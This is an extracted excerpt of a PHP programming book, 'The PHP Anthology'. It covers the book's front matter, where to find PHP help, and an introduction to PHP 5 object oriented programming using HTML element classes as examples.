  • 17. xvii Point, Melbourne, ISBN 0-9752402-1-8), and completed your first project or two with PHP, then this is the book for you. If you’ve been asking questions like "How do I validate a web page form?”, “How do I add a watermark to my photos?”, or “How do I send automated email messages from my web application?”, you’ll find the answers to those questions in this book. If you have the drive to progress your skills or improve your web application through concepts such as reusable components, caching performance, or web services, then you will find this book to be an excellent primer. What’s Covered in this Book? Here’s what you’ll find in each of the chapters of this book: Chapter 1: Introduction This chapter provides a useful guide to finding help through the PHP manual and other resources. It includes an introduction object oriented programming: a run-down of PHP’s class syntax, as well as a primer that explains how all the key elements of the object oriented paradigm apply to PHP. It’s essential prepar­ atory reading for later chapters in this anthology. This chapter also provides tips for writing portable code, and gives us the chance to take a look at some of the main PHP configuration pitfalls. Chapter 2: Using Databases with PDO This chapter provides you with everything you’ll need to get up to speed with the PHP Data Objects (PDO) extension. We start with the basics, covering im­ portant topics such as how to write flexible SQL statements and avoid SQL in­ jection attacks. We then delve into many lesser-known aspects, such as searching, working with transactions and stored procedures, and how to back up your database. Chapter 3: Strings This chapter explores the details of handling content on your site. We’ll discuss string functions you can’t live without, along with the process for validating and filtering user-submitted content.
  • 18. xviii Chapter 4: Dates and Times Here, you’ll learn how to how to use PHP’s date functions, and implement an online calendar. You’ll also obtain a solid grounding in the storage and manip­ ulation of dates in MySQL. Chapter 5: Forms, Tables, and Pretty URLs The essentials of web page forms and tables are covered here. We’ll discuss the development of forms with PEAR::HTML_QuickForm, and you’ll see how to use PEAR::HTML_Table to implement data grids and paged result sets. We’ll also take a look at some tricks you can use with Apache to generate search engine friendly URLs. Chapter 6: Working with Files This chapter is a survival guide to working with files in PHP. Here, we’ll cover everything from gaining access to the local file system, to fetching files over a network using PHP’s FTP client. We’ll go on to learn how to create your own zipped archives with PEAR::Archive_Tar, and touch on the use of the Standard PHP Library. Chapter 7: Email In this chapter, we deal specifically with email-related solutions, showing you how to take full advantage of email with PHP. We’ll learn to successfully send HTML emails and attachments with help from PEAR::Mail and PEAR::Mail_Mime, and to use PHP to easily handle incoming mails delivered to your web server. Chapter 8: Images This chapter explores the creation of thumbnails and explains how to watermark images on your site. We’ll also discuss how you can prevent hotlinking from other sites, create an image gallery complete with Exif data, and produce a few professional charts and graphs—as well as CAPTCHA images—with JpGraph. Chapter 9: Error Handling Understand PHP’s error reporting mechanism, how to take advantage of PHP’s custom error handling features, and how to handle errors gracefully—with a focus on exception handling and custom exceptions—in this action-packed chapter.
  • 19. xix Chapter 10: Access Control Beginning with basic HTTP authentication, then moving on to application-level authentication, this chapter looks at the ways in which you can control access to your site. Later solutions look at implementing a user registration system, and creating a fine-grained access control system with users, groups, and per­ missions. Chapter 11: Caching This chapter takes the fundamental view that HTML is fastest, and shows you how you can take advantage of caching on both the client and server sides to reduce bandwidth usage and dramatically improve performance. It covers HTTP headers, output buffering, and using PEAR:Cache_Lite. Chapter 12: XML and Web Services With XML rapidly becoming a crucial part of almost all web-based applications, this chapter explores the rich XML capabilities of PHP 5. Here, you’ll discover how easy it is to produce and consume web services based on RSS, XML-RPC, SOAP, and REST. Chapter 13: Best Practices The goal of this chapter is to examine some of the techniques that have proven themselves in helping development projects succeed. The discussion covers code versioning, how to write distributable code, how to add API documentation to your work, how to reduce bugs with unit testing, and how to deploy code safely. Running the Code Examples To run the code examples in this book you will need to ensure you have all the re­ quired software, libraries, and extensions. Some of the examples make use of addi­ tional packages that will need to be installed separately. Where solutions requiring additional packages are introduced you will find a link to the relevant web page; be sure to read the documentation, including the installation instructions.
  • 20. xx The following packages are used in the examples in this book: ■ PHP 5.21 (including the GD, EXIF, and XML-RPC extensions) ■ PEAR: http://pear.php.net/ (including Archive_Tar, Cache_Lite, HTML_Table, HTML_QuickForm, Mail, Net_FTP, Structures_DataGrid, and Validate) ■ Zend Framework: http://framework.zend.com/ ■ JpGraph: http://www.aditus.nu/jpgraph/ To run all the examples you will also need a web server, database server, email server and FTP server, although instructions for their installation and configuration are out of scope for this book. If you want to setup a software environment for learning PHP you can’t go past the XAMPP (http://www.apachefriends.org/en/xampp.html) server package for ease of installation and use. It is also available for a variety of operating systems. The Windows version of XAMPP has all of the following components (and more) wrapped up in a single package with a convenient web interface for management: ■ PHP 5 and PEAR ■ Apache HTTP Server: http://httpd.apache.org/ ■ MySQL Database Server: http://mysql.org/ ■ Mercury Mail Transport System: http://www.pmail.com/ ■ Filezilla FTP server: http://filezilla-project.org/ Some examples in the book make specific use of the Apache HTTP Server and MySQL Database Server. The Book’s Web Site Located at http://www.sitepoint.com/books/phpant2/, the web site that supports this book will give you access to the following facilities. The Code Archive As you progress through this book, you’ll note file names above many of the code listings. These refer to files in the code archive, a downloadable ZIP file that contains all of the finished examples presented in this book. Simply click the Code Archive link on the book’s web site to download it.
  • 21. xxi Updates and Errata No book is error-free, and attentive readers will no doubt spot at least one or two mistakes in this one. The Corrections and Typos page on the book’s web site3 will provide the latest information about known typographical and code errors, and will offer necessary updates for new releases of browsers and related standards. The SitePoint Forums If you’d like to communicate with other web developers about this book, you should join SitePoint’s online community.4 The PHP forum,5 in particular, offers an abundance of information above and beyond the solutions in this book, and a lot of fun and experienced PHP developers hang out there. It’s a good way to learn new tricks, get questions answered in a hurry, and just have a good time. The SitePoint Newsletters In addition to books like this one, SitePoint publishes free email newsletters includ­ ing The SitePoint Tribune, The SitePoint Tech Times, and The SitePoint Design View. Reading them will keep you up to date on the latest news, product releases, trends, tips, and techniques for all aspects of web development. Sign up to one or more SitePoint newsletters at http://www.sitepoint.com/newsletter/. Your Feedback If you can’t find an answer through the forums, or if you wish to contact us for any other reason, the best place to write is books@sitepoint.com. We have an email support system set up to track your inquiries, and friendly support staff members who can answer your questions. Suggestions for improvements as well as notices of any mistakes you may find are especially welcome. Conventions Used in this Book You’ll notice that we’ve used certain typographic and layout styles throughout this book to signify different types of information. Look out for the following items. 3 http://www.sitepoint.com/books/phpant2/errata.php 4 http://www.sitepoint.com/forums/ 5 http://www.sitepoint.com/forums/forumdisplay.php?f=34
  • 22. xxii Code Samples Code in this book will be displayed using a fixed-width font like so: <h1>A perfect summer's day</h1> <p>It was a lovely day for a walk in the park. The birds were singing and the kids were all back at school.</p> If the code may be found in the book’s code archive, the name of the file will appear at the top of the program listing, like this: example.css .footer { background-color: #CCC; border-top: 1px solid #333; } If only part of the file is displayed, this is indicated by the word excerpt: example.css (excerpt) border-top: 1px solid #333; Some lines of code are intended to be entered on one line, but we’ve had to wrap them because of page constraints. A ➥ indicates a line break that exists for formatting purposes only, and should be ignored. URL.open("http://www.sitepoint.com/blogs/2007/05/28/user-style-she ➥ets-come-of-age/");
  • 23. xxiii Tips, Notes, and Warnings Hey, You! Tips will give you helpful little pointers. Ahem, Excuse Me … Notes are useful asides that are related—but not critical—to the topic at hand. Think of them as extra tidbits of information. Make Sure you Always … … pay attention to these important points. Watch Out! Warnings will highlight any gotchas that are likely to trip you up along the way.
  • 25. 1 Chapter Introduction PHP is a programming language that’s designed specifically for building web sites, and is both blessed and cursed with being remarkably easy to learn and use. Getting started is extremely simple. Before long, the typical beginner can put together a simple web site and experiment with the wealth of open source projects available through resources like SourceForge.1 Unfortunately, the ease with which PHP-based sites can be developed also means that you can quickly get yourself into trouble. As traffic to your site increases—along with the demand for more features and greater complexity—it’s important to gain a more intimate understanding of PHP, and to research application designs and techniques that have proved successful on large web sites. Of course, you can’t leap into programming and expect to know it all straight away. And even if you could, where would be the fun in that? In this first chapter, I’ll assume you’ve had a basic grounding in PHP, such as that provided in the first few chapters of SitePoint’s introductory PHP title Build Your 1 http://sourceforge.net/
  • 26. 2 The PHP Anthology Own Database Driven Website Using PHP & MySQL,2 and instead concentrate on the essentials of “getting around” in PHP. In this chapter, you’ll find out where to get help—a defense against those that bark “Read the manual!” at you—and take a quick tour of PHP 5 object oriented syntax and concepts. Not everything here fits under the heading of “basic”—there may also be a few surprises in store for the more experienced PHP developers, so keep your eyes peeled! Be warned, though, that although the discussion of PHP syntax isn’t the most invig­ orating of subjects, it is essential to prepare for later chapters. If you start to struggle, remember the lesson from The Karate Kid: you must learn “wax on, wax off” before you can perform the crane kick. Where do I get help? PHP is the most widely-used web scripting language, running on over 20 million web sites. For an open source technology that lacks any corporate funding whatso­ ever, its popularity may seem inexplicable. Yet PHP’s success is no mystery; it has one of the most active and helpful online communities of any technology. Recent estimates place the number of PHP developers worldwide at around 500,000 and, given the nature of the medium, it’s fair to assume that a large proportion are active online. In other words, for developers of PHP-based web sites, help is only ever a few clicks away. Solution There are numerous PHP resources available on the Web today, not the least of which is the official PHP Manual.3 RTFM: Read the Fine Manual There’s a well-known, four-letter acronym, RTFM, which tends to be used to harass beginners in all areas of computing. While I can understand veterans might be un­ willing to repeat endlessly the same, well-documented instructions, I think the basic assumption should be that we all know how to read the manual in the first place. 2 http://www.sitepoint.com/books/phpmysql1/ 3 http://www.php.net/
  • 27. Introduction 3 The documentation for PHP is excellent, and is maintained by volunteers who dedicate themselves to keeping it up to date, understandable, and relevant. The online version is extremely easy to navigate and contains further know-how in the form of annotations from developers across the globe. The manual is one of the areas in which PHP is truly exceptional; software houses like Sun and Microsoft still have a long way to go to provide this quality of material to developers working on their platforms. The manual is also available in twenty-four different languages but as you’re reading this book I’ll assume you’re happy with the English version of the manual. It’s broken into five main sections plus appendices. It’s worth knowing what kinds of information can be found where—at least within the first five sections, which are the most relevant to the typical PHP developer. I. Getting Started and II. Installation and Configuration ■ http://www.php.net/getting-started/ ■ http://www.php.net/install/ These sections are where a true beginner starts. Section I has a basic introduction to PHP, explaining what PHP is and what it can do, as well as providing a simple tutorial to show how PHP works. Section II shows how to perform a basic installation of PHP on various operating systems in detail. III. Language Reference ■ http://www.php.net/langref/ This section covers the fundamentals of PHP as a programming language. Some of these are essential to your ability to achieve anything with PHP, while others become useful as you look for ways to improve your technique. Reading the whole lot in one sitting may well be like reading a dictionary. Fortunately, it’s possible to absorb much of the information contained in the language reference by reading the wealth of tutorials available online, and examining the code that’s used in open source PHP applications. Certainly, as you read this book, I hope you’ll pick up a thing or two about getting the most out of PHP. However, it’s worth familiarizing yourself with the subjects contained in this section of the manual, and keeping them in the back of your mind for future reference.
  • 28. 4 The PHP Anthology IV. Security ■ http://www.php.net/security/ This is a very important chapter for beginners and experienced coders alike. Con­ taining information on configuration settings, file system and database security, and general “good practices,” it’s a must for all coders. Most security problems stem from the code, not PHP itself, so being paranoid is a good thing for any coder! The earlier in your PHP coding experience you become familiar with this section of the documentation, the better. After all, it’s easier to learn a good habit than to break a bad one. V. Features ■ http://www.php.net/features/ Covered in this section are the core elements of PHP that are generally focused on solving specific web-related problems. Much of the Features section reads like an “executive summary” and, from a developer’s point of view, the information con­ tained here may be easier to understand when you see it in action—for instance, in the examples we’ll see throughout this book. VI. Function Reference ■ http://www.php.net/funcref/ This section makes up the real body of the manual, covering all aspects of the functionality available within PHP. This is where you’ll spend most of your time as you progress with PHP, so you’ll be glad to hear that the PHP group has made a concerted effort to make this section easy to use. It’s even fun, in an idle moment, just to trawl the manual and be amazed by all the things you can do with PHP. Yes, I did just describe reading a manual as “fun!” The function reference is broken into subsections that cover various categories of functions, each category corresponding to a PHP extension. Apart from the core language syntax, most parts of PHP are grouped into extensions representing discrete functionality.
  • 29. Introduction 5 PHP Extensions The notion of an extension can be a little confusing to start with, as many are dis­ tributed with the standard PHP installation. The String functions, which we’d be hard-pressed to live without, are a case in point. In general, the PHP group distributes as part of the default PHP installation all the extensions it regards as being essential to developers. Extensions that are regarded as nonessential functionality (that is, they’ll be required by some, but not all developers) must be added separately. The important information about each installation appears under the Installation heading on the extension’s main page. Core extensions require no installation, as they’re included with the PHP core; the documentation clearly indicates whenever this is the case with the sentence, “There is no installation needed to use these functions; they are part of the PHP core.” Nonstandard extensions are found in the PECL Repository.4 PECL, the PHP Extension Community Library, is a directory of all known PHP extensions. The process for finding and installing PECL extensions is explained in the Installa­ tion and Configuration section of the manual. Access to information within the Function Reference is available through the Search field (at the manual’s top right) and by searching within the Function List. Note that searching within the Function List examines only the Function Reference section of the manual. To search the entire manual, you need to search within Online Documentation. Another handy way to move around the manual is to take short cuts directly to functions by submitting the name of the topic you’re interested in via the URL. For example, try entering the following in your browser’s address field: http://www.php.net/strings/. This will take you to http://www.php.net/manual/en/ref.strings.php, which is the main page for the Strings extension. At the bottom of the page, you’ll see a list of all the functions that the extension makes available. Taking the strpos function as an example, enter the URL http://www.php.net/strpos/ (which takes you to 4 http://pecl.php.net/
  • 30. 6 The PHP Anthology http://www.php.net/manual/en/function.strpos.php). You’ll see the information shown in Figure 1.1. Figure 1.1. The documentation page for strpos on php.net The first line contains the name of the function, while the second line lists the PHP versions in which the function is available. The third line tells us what the function actually does. In this case, it’s a fairly terse explanation, but strpos really isn’t a subject that many can get excited about. Under the Description heading is perhaps the most important line of all—the func­ tion’s signature. The signature describes the parameters—the required and optional values this function accepts—and the return value, which is the value we receive after the function has run. Reading from left to right, we have int, which tells us that the value returned by the function is an integer (in this case, the position of one piece of text within another). Next comes the name of the function itself, and then, in parentheses, the parameters this function takes, separated by commas. Let’s look at the parameter string $haystack. This says that the first argument—the value supplied to a parameter—should be a string value, while $haystack simply names the argument so that it can be referred to in the detailed description. Note
  • 31. Introduction 7 that the third argument is placed inside square brackets, which means it’s optional (that is, you don’t have to supply this argument). Here’s a simple example that shows this function at work: helloworld.php <?php $haystack = 'Hello World!'; $needle = 'orld'; $position = strpos($haystack, $needle); echo 'The substring "' . $needle . '" in "' . $haystack . '" begins at character ' . $position; ?> Notice that here, I’ve used strpos similarly to the way it appears in the manual. I used the variable names $haystack and $needle to make clear the way each relates to the explanation in the manual, but you can use whatever variable names you like. The function signature convention is used consistently throughout the manual, so once you’re used to it, you’ll quickly be able to grasp how to use functions you haven’t tried before. User Comments You’ll find user-submitted comments at the bottom of each page in the manual. Usually, at the very least, you’ll see an example that shows how the function is used—information which may solve the particular dilemma you’ve run into. In many cases, you’ll also find alternative explanations and uses for a function, which help to broaden your understanding. Just keep in mind that the user comments are not part of the official documentation, so some of the comments may not be entirely truthful. Usually, any that are factually dubious are later corrected and clarified. Other Resources Outside the manual, there are literally thousands of online resources from which you can get further help. I would dare to say that 99% of all the common problems you’ll encounter with PHP have already been faced by someone, somewhere, and their resolutions are available online. This means that the most obvious (but some­ times forgotten) place to begin looking is Google, where a quick search for PHP strpos problem will give you an idea of what I mean.
  • 32. 8 The PHP Anthology There are also some excellent sites where you can get answers directly from other PHP developers (for free, of course—it’s part of the PHP ethic). Perhaps the three biggest English-language resources are: ■ SitePoint Forums, at http://www.sitepointforums.com/ ■ Dev Shed Forums, at http://forums.devshed.com/ ■ phpBuilder, at http://www.phpbuilder.com/board/ Each of these sites hosts online discussions and, as such, has a very friendly, easy- to-use interface. All have very active memberships and you should find most of your questions answered within 24 hours. Before you post a question or use one of the other methods listed later to find help, be sure to read How To Ask Questions The Smart Way to help you do the homework for your question.5 Note that when you ask for help on forums, the principle of helping others to help yourself comes to the fore. One of the most common mistakes that beginners make when posting a question is to post a message that says, “This script has a problem,” and paste your entire PHP script below. Instead, it’s much better to narrow the problem down—identify the area where you’re having problems, and paste in this code snippet, along with other relevant information such as error messages, the purpose of the code, your operating system, and so on. The people who offer help generally don’t want to spend more than a few minutes on your problem (they’re doing it for free, after all), so saving them time will improve your chances of receiving a helpful answer. Also available to those with an IRC (Internet Relay Chat) client are numerous IRC channels dedicated to PHP development. Two of the more popular channels are 6 7 #php on efnet.org, and ##php on freenode.net. These resources can provide imme­ diate assistance for your problem but, like the forums, the channels’ users will expect you to have done your homework beforehand. Less convenient, but perhaps the most effective last resorts are the PHP mailing lists,8 where beginners are encouraged to use the PHP General User list.9 The lists 5 http://www.catb.org/~esr/faqs/smart-questions.html 6 http://efnet.org/ 7 http://freenode.net/ 8 http://www.php.net/mailing-lists.php 9 http://news.php.net/group.php?group=php.general
  • 33. Introduction 9 are available for limited browsing, though it’s possible to search some of them using the Search tool on the PHP web site, and selecting the list of your choice from the search results. Zend,10 the company developing the core of the PHP engine, also hosts a fairly active forum for general PHP questions.11 Of course, if you want a guaranteed answer, it’s worth investigating paid support options. More information can be found on the Zend Network web site.12 What is OOP? Just tackling the basics of object oriented programming, or OOP, could easily con­ stitute a whole book—and there are plenty of those out there to prove it! A vast range of information is likely to be covered in any discussion of object oriented programming, so this section will provide a quick overview to help you to understand the basic concepts and to prepare you for the rest of the book. It’s not meant to be a comprehensive primer, but rather is intended to initiate you into the world of OOP. Solution The object oriented programming paradigm is an approach to programming that’s intended to encourage the development of well-structured and maintainable applic­ ations. Many PHP coders regard object oriented programming as some kind of mystical art, given that examples of PHP frequently use only a procedural ap­ proach.13 This is a shame, as there is much to be gained from adopting an object oriented approach to developing PHP applications, perhaps the most important benefit of which is code reuse. A well-written piece of object oriented code can easily be employed to solve the same problem in other projects; we can simply slot it in whenever we need it. There’s a growing number of object oriented code repositor­ 10 http://www.zend.com/ 11 http://www.zend.com/forums/ 12 http://www.zend.com/core/network/ 13 Procedural programming is the name given to non-object-oriented programming approaches to problem solving that aim to break a programming task into a collection of subroutines.
  • 34. 10 The PHP Anthology ies—such as PEAR14 and PHP Classes15—that can save you hours of slaving over well-charted problems, and leave you free to focus on the specifics of your applica­ tion. With the release of PHP 5, we’ve gained a greatly enhanced object model that provides improved performance and features that weren’t available in PHP 4. In practice, learning to use the object model provided by PHP requires us to achieve two goals, which usually have to be undertaken simultaneously: ■ You’ll need to learn the PHP class syntax and object oriented terminology. ■ You must make the mental leap from procedural to object oriented code. The first step is easy; after all, it’s just a matter of memorization. The second step—the mental leap—is both easy and challenging. Once you take the leap, you’ll no longer think about long lists of tasks that a single script should accomplish; in­ stead, you’ll see programming as putting together a set of tools to which your script will delegate work. Classes Explained A class is a generic blueprint of something. “Of what?” you ask. Well, of just about anything: a car, a customer, a product, a button; any object that’s relevant to the application. A class is not actually an object. Instead, it defines the methods (or behaviors) and properties (or attributes, or state) of the object. A class is a plan that’s used to create an object just as the blueprint of a car is used to build a car—it’s simply a plan to achieve the desired product. The PHP Manual contains a wealth of information on OOP,16 but if you have no knowledge of OOP, the best place to start trying to understand it is with the basic PHP class syntax.17 Let’s take a closer look at classes by creating one ourselves. Let’s create a very simple class called HTMLParagraph that outputs an HTML para­ graph element. Now, you may be wondering, “What use is a class that does so little?” But please bear with me through this gentle introduction—I promise it’s building to something useful! 14 http://pear.php.net/ 15 http://www.phpclasses.org/ 16 http://www.php.net/oop5/ 17 http://www.php.net/manual/en/language.oop5.basic.php
  • 35. Introduction 11 To begin with, we start with the keyword class, followed by the name of the class—in this case, HTMLParagraph. Then we use opening and closing braces to delimit where the class begins and ends: HTMLParagraph.php (excerpt) <?php class HTMLParagraph { ⋮ properties and methods in here } ?> We can add properties and methods between these braces. Properties, also known as member variables, are the attributes that will be available to the objects created from this class. They hold the data values that the objects will need in order to function. For example, an object created from the HTMLParagraph class will need a property to store the contents of the paragraph. We declare this property to be private using the private modifier, which we’ll discuss further on. By convention, and for readability, properties are declared at the start of the class: HTMLParagraph.php (excerpt) <?php class HTMLParagraph { private $content; ⋮ methods under here } ?> Methods describe the actions the objects will enable us to perform. The methods of a class contain the instructions that the objects will need in order to function. Let’s add some methods to our HTMLParagraph class: HTMLParagraph.php (excerpt) <?php class HTMLParagraph {
  • 36. 12 The PHP Anthology private $content; public function __construct($content = '') { $this->content = $content; } public function getSource() { return '<p>' . $this->content . '</p>'; } ⋮ possibly more methods under here } ?> Here, we’ve added two methods to our class—__construct and getSource. __construct is a special method that initializes our objects for us, while getSource is a method that allows our HTMLParagraph objects to fulfill their purpose: to write a paragraph element in HTML. Methods can be seen as communication: an object can call a method on another object and receive an answer in return. For example, an object can call the getSource method on an object created from our HTMLParagraph class, and receive the HTML source for the paragraph element in response. The HTMLParagraph object takes care of all the details for us. As we’ve seen, methods are the actual workers of the class—its behaviors or actions. For example, our HTMLParagraph class has a getSource method to assemble the content into a valid HTML paragraph element. A method’s job is to do one thing and one thing only—and to do it well. The syntax for a method is straightforward (note that brackets indicate optional syntax): public|protected|private [static] function methodName([$param1[, ➥ $param2]]){…}
  • 37. Introduction 13 Encapsulation and Visibility Encapsulation is a basic concept of object oriented programming that dictates that a class should have a public interface and a private implementation. The public interface is the appearance—put simply, the methods and properties—possessed by an object created from the class, which all other objects can see and use. The private implementation refers to the inner workings of the class, which only the objects created from that class need to know about. The separation of the class’s inner workings from its outer appearance is essential for the production of quality object oriented code. Users of your class should be able to use the class’s public interface, or API (Applic­ ation Programming Interface), without caring what’s inside, and with confidence that they’ll obtain the desired output. Hiding the inner workings of a class from the user ensures that we can change those internals as required over time—to fix bugs, improve performance, or completely change how the method is implemen­ ted—without causing interference or disruption to users. Think of a class as a black box: users just plug their data into the object and receive the results they want. We indicate the public interface and private implementation of our class by describ­ ing the visibility of its properties and methods—in short, describing who can see and access them. PHP 5 has three levels of visibility: public, protected, and private. The public visibility level allows any object or script to see and use the attribute or method.18 Protected visibility means that only those classes which inherit (we’ll discuss the concept of inheritance in the pages to come) from the class, as well as the class itself, can see the attribute or method. The private visibility level describes cases in which only the class itself can see the method or attribute. Note that in our example class the properties are private and the methods are public. When you’re beginning to learn object oriented programming, there’s often some degree of temptation to make all your classes public and to avoid thinking about encapsulation at all. However, it’s important for other users of your class to know how your class should be used, and what behavior they can expect—they’ll assume that everything that’s public is safe for them to use. Obviously, if you then change those public classes, you can cause a lot of problems! So, to meet the objective of 18 Technically speaking, a method doesn’t need a visibility level. If none is provided, the method is automatically public.
  • 38. 14 The PHP Anthology encapsulation we must reduce the visibility of all our properties and methods to the lowest possible levels. Constructors and Destructors A constructor is a special method that’s used when we first instantiate or create the object. The constructor method is named __construct no matter what the class’s name is. Since the constructor is called when we create an object from a class, it’s in this method that we set any default values for the object’s properties—also referred to as instance variables, the properties of a specific instance of a class—or anything else that’s needed to initialize the object. In our example class, we initialized the various properties that we needed in order to create the paragraph element. Another common example is an order class for a shopping cart—the cart is initialized in the __construct method, where the customer number is set, the number of items in the cart is set to zero, and the cart balance is set to zero dollars. A destructor is the constructor’s complement. Like the constructor, the destructor has a special name, __destruct, that’s used no matter what the class’s name is. __destruct is also a special method that runs immediately before an object is des­ troyed. It’s in the destructor that we tie up any loose ends we may have, for instance, closing a database connection or a file handler. Magic Methods __construct and __destruct are examples of what are known as magic methods. Magic methods are a collection of methods that perform special internal PHP class functions. They all begin with __ (double underscore) and you can read more about them in The PHP Manual.19 For example, the __toString method is called when an object created from the class is converted to a string. This comes in very handy, as you will see. Creating Objects Now that we know what a class is, it’s time to talk about objects. As we saw earlier in this chapter, an object is the item that’s created or, in object oriented terminology, instantiated, using the class as the blueprint. Thus the object is the actual imple­ mentation of the class. Because of this, we can instantiate multiple objects of the same class, each with its own individual characteristics and states—just as a single 19 http://www.php.net/manual/en/language.oop5.magic.php
  • 39. Introduction 15 blueprint can be used to build multiple cars. The cars may all be the same make and model, but they’re all driving at different speeds, and have different mileage totals. Let’s look at some code that will help clarify the concept of objects: HTMLParagraph.php (excerpt) $para = new HTMLParagraph('Hello world!'); echo $para->getSource(); In the first line above, I instantiate the object with the new keyword, being sure to pass along any data that the constructor will need. Basically, that line of code in­ structs PHP to use the HTMLParagraph class to make a new object, and place that object in the $para variable. Since the object in $para is an implementation of the HTMLParagraph class, it has all the functionality and properties of that class. The output of the above code listing will be: <p>Hello world!</p> The $this Variable Now that we understand the difference between an object and class, I want to back up a bit. In the HTMLParagraph class file, you’ll find that the $this variable appears in the class methods—the getSource method, for example: HTMLParagraph.php (excerpt) public function getSource() { return '<p>' . $this->content . '</p>'; } Within any method, including the constructor, the $this variable points to the object in which the method is running, and allows the method to access other methods and variables that belong to that particular object. So even though we may have two HTMLParagraph objects running the same class function code, when we call the
  • 40. 16 The PHP Anthology getSource function on one of them, $this will point to the object that owns the function we called—the one in which we’re retrieving the HTML source. The other object’s connection will remain open. The -> (arrow) operator is the syntax we use to access an attribute or method that’s named within the object. You can use this operator to access an object’s own prop­ erties and methods within the script, as well as within the object itself. Treating an Object Like a String If you recall, the __toString method is called when an object created from the class is converted to a string. This will be very handy for our HTMLParagraph as it’ll allow our paragraph objects to be used in string concatenation. Here’s our __toString method: HTMLParagraph.php (excerpt) public function __toString() { return $this->getSource(); } Our __toString method calls the getSource method, which returns the HTML source for our paragraph. So now it’s possible to use it in this way: HTMLParagraph.php (excerpt) <?php $para2 = new HTMLParagraph('The __toString method makes life' . ' easy!'); echo "<h1>The Magic __toString Method</h1>n"; echo $para2; ?> The output from the above code listing will be: <h1>The Magic __toString Method</h1> <p>The __toString method makes life easy!</p>
  • 41. Introduction 17 Inheritance Inheritance is another of the fundamental pieces of the object oriented paradigm and is an important aspect of its expressive power. The term refers to a relationship in which one class is defined as being a child or subclass of another. The child class inherits the methods and properties defined in the parent class, and can change them or add more of its own. Inheritance allows you to define the common methods and properties of a class that you’d like all the child classes to share. Our HTMLParagraph class creates an adequate HTML paragraph element, but there are a lot more HTML elements besides paragraphs and they all share some common features. Let’s create a parent class called HTMLElement and add all the common methods and properties: HTMLElement.class.php (excerpt) <?php class HTMLElement { protected $content; protected $tagname; protected $attributes; Thinking about the common properties of HTML elements, we add two new prop­ erties $tagname and $attributes to store the tag name and attributes of the HTMLElement respectively. Notice that I’ve declared the properties protected. This allows child classes to have access in order to redefine them. If we’d declared the properties private, the child classes wouldn’t be able to access them. The __construct method now takes a second argument for the element attributes: HTMLElement.class.php (excerpt) public function __construct($content, $attributes = array()) { $this->content = $content; $this->attributes = $attributes; }
  • 42. 18 The PHP Anthology Our new getSource method now has all the smarts to create the source for any HTML element as long as the $tagname property is defined: HTMLElement.class.php (excerpt) public function getSource() { return '<' . $this->tagname . $this->getAttributeSource() . '>'. $this->content . '</' . $this->tagname . '>'; } The getSource method will also loop through the attributes array and assemble the HTML source string for the element’s attributes. It does this by calling the getAttributeSource method. The getAttributeSource method builds and returns the source string for the HTML element’s attributes, if any are present: HTMLElement.class.php (excerpt) public function getAttributeSource() { $attributes = ''; if (count($this->attributes)) { foreach ($this->attributes as $attrnme => $attrval) { $attributes .= ' ' . $attrnme . '="' . $attrval . '"'; } } return $attributes; } Finally, the __toString magic method remains the same as the previous version—it already does what we need it to, and it can be used for any HTML element:
  • 43. Introduction 19 HTMLElement.class.php (excerpt) public function __toString() { return $this->getSource(); } } ?> You can see that marking our HTMLParagraph class as a child of HTMLElement will be far easier than building the HTMLParagraph class from scratch—most of the work has already been done for us. We use the extends keyword to indicate the relation­ ship: HTMLParagraph.class.php (excerpt) <?php require_once 'HTMLElement.class.php'; class HTMLParagraph extends HTMLElement { protected $tagname = 'p'; public function __construct($content, $attributes = array()) { parent::__construct($content, $attributes); } } ?> HTMLParagraph is now a child of HTMLElement. Alternatively, we could say that HTMLElement is the parent or superclass of HTMLParagraph. We’ve redefined the $tagname property and changed the constructor method. Just ignore the parent::__construct($content, $attributes); part for now, I’ll explain it very soon. Now we can instantiate the child class, gain access to the getSource method, and—because we’ve redefined the $tagname property—the HTML source is output appropriately for an HTML paragraph element:
  • 44. 20 The PHP Anthology childClass.php (excerpt) <?php require 'HTMLParagraph.class.php'; $para = new HTMLParagraph("The object oriented programmingn" . " paradigm is an approach to programming that's intendedn" . " to encourage the development of well-structured andn" . " maintainable applications.", array( 'id' => 'oop_intro', 'class' => 'introduction' ) ); echo "<h1>OOP in PHP 5</h1>n"; echo $para; ?> The output for the above code will be: <h1>OOP in PHP 5</h1> <p id="oop_intro" class="introduction">The object oriented ➥ programming paradigm is an approach to programming that's intended to encourage the development of well-structured and maintainable applications.</p> This example shows the basics of how inheritance works, but the real power of this capability cannot be demonstrated without discussing overriding—the mechanism by which a child class can alter the methods and properties of its parent class. Overriding Methods and Properties It’s perfectly acceptable to give a method or property in the child class the same name as a method or property in the parent class, or to override the method or property. In our HTMLParagraph class we override the $tagname property of the parent HTMLElement class. When we call HTMLParagraph->getSource and it grabs the $tagname value, it retrieves the overridden value p. To demonstrate, let’s create another child class; I give you the HTMLImage class. HTML image tags are constructed slightly differently—they have no end tag—so we’ll need to override the getSource method to handle this unique situation:
